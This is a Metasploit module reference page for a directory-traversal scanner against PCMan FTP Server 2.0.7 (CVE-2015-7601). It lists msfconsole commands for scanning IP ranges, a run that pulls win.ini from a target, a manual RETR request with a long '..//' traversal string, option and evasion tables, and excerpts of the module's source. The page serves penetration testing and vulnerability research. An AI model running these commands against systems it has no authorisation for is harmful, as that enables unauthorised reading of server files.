PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/ftp/pcman_ftp_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
Module: auxiliary/scanner/ftp/pcman_ftp_traversal
Source code: modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb
Disclosure date: 2015-09-28
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: ftp
Target network port(s): 21, 2121
List of CVEs: CVE-2015-7601

This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/ftp/pcman_ftp_traversal
msf auxiliary(pcman_ftp_traversal) > show options
    ... show and set options ...
msf auxiliary(pcman_ftp_traversal) > set RHOSTS ip-range
msf auxiliary(pcman_ftp_traversal) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(pcman_ftp_traversal) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(pcman_ftp_traversal) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(pcman_ftp_traversal) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ..//

Linked to software download Exploit-DB

Verification Steps


  1. Start msfconsole
  2. Do: use modules/auxiliary/scanner/ftp/pcman_ftp_traversal
  3. Do: set RHOSTS [ip]
  4. Do: run

Scenarios


PCMan FTP Server 2.0.7 on Windows 7 (X64)

  msf > use modules/auxiliary/scanner/ftp/pcman_ftp_traversal
  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > show options
  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set RHOST 1.1.1.1
    rhost => 1.1.1.1
  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set PATH WINDOWS\\win.ini
    PATH => WINDOWS\win.ini
  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > run    
    [+] 192.168.2.252:21      - Stored WINDOWS\win.ini to /root/.msf4/loot/20191120201523_default_1.1.1.1_pcman.ftp.data_069450.ini
    [*] 192.168.2.252:21      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Manual Exploitation

  2019/11/20 [12:46] (00588) 1.1.1.2> User connecting from 1.1.1.2

  2019/11/20 [12:46] (00588) 1.1.1.2> USER anonymous
  2019/11/20 [12:46] (00588) Anonymous> 331 User name okay, need password.

  2019/11/20 [12:46] (00588) Anonymous> PASS *****
  2019/11/20 [12:46] (00588) Anonymous> 230 User logged in

  2019/11/20 [12:46] (00588) Anonymous> PASV
  2019/11/20 [12:46] (00588) Anonymous> 227 Entering Passive Mode (1.1.1.1,8,1)

  2019/11/20 [12:46] (00588) Anonymous> RETR ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//WINDOWS\win.ini
  2019/11/20 [12:46] (00588) Anonymous> 150 File status okay; Open data connection.

  2019/11/20 [12:46] (00588) Anonymous> 226 Data Sent okay.

  2019/11/20 [12:46] (00588) Anonymous> User Disconnected.

Go back to menu.

Msfconsole Usage


Here is how the scanner/ftp/pcman_ftp_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/ftp/pcman_ftp_traversal

msf6 auxiliary(scanner/ftp/pcman_ftp_traversal) > show info

       Name: PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
     Module: auxiliary/scanner/ftp/pcman_ftp_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-09-28

Provided by:
  Jay Turla
  James Fitts
  Brad Wolfe <[email protected]>

Check supported:
  Yes

Basic options:
  Name     Current Setting      Required  Description
  ----     ---------------      --------  -----------
  DEPTH    32                   yes       Traversal Depth (to reach the root folder)
  FTPPASS  [email protected]  no        The password for the specified username
  FTPUSER  anonymous            no        The username to authenticate as
  PATH     boot.ini             yes       Path to the file to disclose, relative to the root dir.
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    21                   yes       The target port (TCP)
  THREADS  1                    yes       The number of concurrent threads (max one per host)

Description:
  This module exploits a directory traversal vulnerability found in 
  PCMan FTP Server 2.0.7. This vulnerability allows an attacker to 
  download arbitrary files from the server by crafting a RETR command 
  that includes file system traversal strings such as '..//'

References:
  https://www.exploit-db.com/exploits/38340
  https://nvd.nist.gov/vuln/detail/CVE-2015-7601

Module Options


This is a complete list of options available in the scanner/ftp/pcman_ftp_traversal auxiliary module:

msf6 auxiliary(scanner/ftp/pcman_ftp_traversal) > show options

Module options (auxiliary/scanner/ftp/pcman_ftp_traversal):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   DEPTH    32                   yes       Traversal Depth (to reach the root folder)
   FTPPASS  [email protected]  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   PATH     boot.ini             yes       Path to the file to disclose, relative to the root dir.
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)

Advanced Options


Here is a complete list of advanced options supported by the scanner/ftp/pcman_ftp_traversal auxiliary module:

msf6 auxiliary(scanner/ftp/pcman_ftp_traversal) > show advanced

Module advanced options (auxiliary/scanner/ftp/pcman_ftp_traversal):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   CHOST                                 no        The local client address
   CPORT                                 no        The local client port
   ConnectTimeout       10               yes       Maximum number of seconds to establish a TCP connection
   FTPDEBUG             false            no        Whether or not to print verbose debug statements
   FTPTimeout           16               yes       The number of seconds to wait for a reply from an FTP command
   PassiveMode          false            no        Set true for extended passive (EPSV) ftp mode.
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                             no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode        PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion           Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/ftp/pcman_ftp_traversal module can do:

msf6 auxiliary(scanner/ftp/pcman_ftp_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/ftp/pcman_ftp_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/ftp/pcman_ftp_traversal) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

data_connect failed; posssible invalid response


Here is a relevant code snippet related to the "data_connect failed; posssible invalid response" error message:

56:	    begin
57:	      # Login anonymously and open the socket that we'll use for data retrieval.
58:	      connect_login
59:	      sock = data_connect
60:	      if sock.nil?
61:	        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
62:	        print_status(error_msg)
63:	        elog(error_msg)
64:	      else
65:	        file_path = datastore['PATH']
66:	        file = ::File.basename(file_path)

data_connect failed; posssible invalid response


Here is a relevant code snippet related to the "data_connect failed; posssible invalid response" error message:

70:	        res = send_cmd( ["RETR", retr_cmd])
71:	
72:	        # read the file data from the socket that we opened
73:	        # dont assume theres still a sock to read from. Per #7582
74:	        if sock.nil?
75:	          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
76:	          print_status(error_msg)
77:	          elog(error_msg)
78:	          return
79:	        else
80:	          # read the file data from the socket that we opened

<FILE_PATH> not found


Here is a relevant code snippet related to the "<FILE_PATH> not found" error message:

80:	          # read the file data from the socket that we opened
81:	          response_data = sock.read(1024)
82:	        end
83:	
84:	        unless response_data
85:	          print_error("#{file_path} not found")
86:	          return
87:	        end
88:	
89:	        if response_data.length == 0 or ! (res =~ /^150/ )
90:	          print_status("File (#{file_path})from #{peer} is empty...")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Jay Turla
  • James Fitts
  • Brad Wolfe <brad.wolfe[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.